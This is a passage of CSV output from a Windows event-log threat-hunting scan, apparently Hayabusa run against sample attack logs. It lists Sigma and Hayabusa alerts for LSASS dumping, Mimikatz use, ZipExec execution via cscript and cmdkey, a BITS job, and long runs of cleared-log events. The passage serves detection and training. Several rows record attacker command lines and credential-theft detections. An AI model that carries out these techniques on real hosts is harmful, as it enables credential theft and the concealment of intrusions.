with LSASSY (PowerShell).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: 
LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript 
testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx -2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx -2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx -2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx -2021-10-24 
06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.340 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.903 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.341 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 